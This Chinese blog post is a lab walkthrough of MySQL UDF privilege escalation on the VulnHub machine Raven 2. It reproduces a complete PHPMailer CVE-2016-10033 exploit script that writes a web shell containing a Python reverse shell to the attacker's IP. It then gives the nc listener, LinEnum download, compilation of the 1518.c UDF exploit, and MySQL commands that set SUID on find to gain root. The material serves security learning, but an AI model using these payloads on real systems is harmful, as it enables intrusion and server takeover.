文章最后更新时间为:2021 年 10 月 15 日 12:52:23 Loading... # 了解UDF mysql内置函数不满足需要,所以mysql提供了添加新函数的机制,自行添加的mysql函数就称为UDF(Userdefined function-用户自定义函数) udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写 # UDF提权原理 用户可以自定义提权的函数(比如执行系统命令)来进行提权。 # UDF提权条件 1.Mysql版本大于5.1时,udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。 2.Mysql版本小于5.1版本时,udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。 3.掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备root账号所具备的权限的其它账号也可以。这里允许root账户外连,(grant all PRIVILEGES on *.* to 'root'@'192.168.189.1' identified by '112358'; #这条命令就能让root用户指定ip连接) 4.可以将udf.dll写入到相应目录的权限。 # 复现 **环境** 攻击机 - kali(192.168.112.129) 靶机 - https://www.vulnhub.com/entry/raven-2,269/(192.168.112.145) **过程** 1.开启靶机,先用kali扫描靶机IP ![屏幕截图 2021-10-15 104120.jpg][1] 2.访问80端口,扫描网站目录 > dirb http://192.168.112.145/ 3.发现是wordpress的网站,并且扫出来几个目录 ![05916.jpg][2] 4.挨个访问尝试,发现/vendor目录存在目录遍历 在PATH文件发现flag1和web目录 ![21.jpg][3] ![409.jpg][4] 5.根据`PHPMailerAutoload.php`文件,找到PHPMailer远程代码执行漏洞(CVE-2016-10033) 漏洞成因:phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload。 利用脚本: from requests_toolbelt import MultipartEncoder import requests import os import base64 from lxml import html as lh os.system('clear') print("\n") print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ") print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗") print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝") print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗") print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║") print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝") print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n") # 目标地址和写入的文件名 target = 'http://192.168.112.145/' backdoor = '/shell.php' # 攻击者IP和端口(用来接受反弹shell) payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,' \ 'socket.SOCK_STREAM);s.connect((\\\'192.168.112.129\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),' \ '1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?> ' # payload = '<?php @eval($_POST["cmd"]); ?>' # 网站路径和文件名 fields = {'action': 'submit', 'name': payload, 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com', 'message': 'Pwned'} m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') headers = {'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type} # proxies = {'http': 'localhost:8081', 'https':'localhost:8081'} print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') r = requests.post(target, data=m.to_string(), headers=headers) print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') r = requests.get(target + backdoor, headers=headers) if r.status_code == 200: print('[+] ExPLoITeD ' + target) 执行成功后 ![102.jpg][5] 6.到kali监听4444端口 > nc -lvnp 4444 ![20652.jpg][6] 查看wordpress目录下的wp-config.php里的数据库密码 ![120825.jpg][7] 7.nc模式下的shell不支持su交互,使用`python -c 'import pty;pty.spawn("/bin/bash")'`命令,生成一个交互式shell ![50.jpg][8] 8.使用`LinEnum.sh` > wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh > chmod 777 LinEnum.sh > ./LinEnum.sh 9.利用UDF提权,先找到exp文件(`/usr/share/exploitdb/exploits/linux/local/1518.c`) 10.编译exp > gcc -g -c 1518.c > gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc 11.上传1518.so文件到靶机(可以创建webshell用蚁剑连接上传) 12.连接mysql ![22516.jpg][9] 13.提权 先选择一个数据库 mysql> use wordpress Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed 创建表foo mysql> create table foo(line blob); Query OK, 0 rows affected (0.02 sec) 读取1518.so并添加到foo表里的一行 mysql> insert into foo values(load_file('/var/www/html/1518.so')); Query OK, 1 row affected (0.01 sec) 查询刚才添加的数据,并并保存到`/usr/lib/mysql/plugin/1518.so`文件(mysql存放自定义函数的地方) mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'; Query OK, 1 row affected (0.00 sec) 加载1518.so函数文件用来创建自定义函数 mysql> create function do_system returns integer soname '1518.so'; Query OK, 0 rows affected (0.01 sec) 查看mysql.func表 mysql> select * from mysql.func; +-----------+-----+---------+----------+ | name | ret | dl | type | +-----------+-----+---------+----------+ | do_system | 2 | 1518.so | function | +-----------+-----+---------+----------+ 1 row in set (0.00 sec) 执行`chmod u+s /usr/bin/find`命令 mysql> select do_system('chmod u+s /usr/bin/find'); +--------------------------------------+ | do_system('chmod u+s /usr/bin/find') | +--------------------------------------+ | 0 | +--------------------------------------+ 1 row in set (0.01 sec) 退出mysql mysql> quit Bye 查看foo文件`touch foo` 执行whoami命令,返回root,获得root权限 www-data@Raven:/var/www/html$ find foo -exec 'whoami' \; root [1]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/4006653621.jpg [2]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/2264684343.jpg [3]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/3726272006.jpg [4]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/3432633861.jpg [5]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/1306386926.jpg [6]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/3163546189.jpg [7]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/2647236151.jpg [8]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/1916809068.jpg [9]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/2543730559.jpg Last modification:October 15, 2021 © Allow specification reprint Support Appreciate the author Like 0 如果觉得我的文章对你有用,请随意赞赏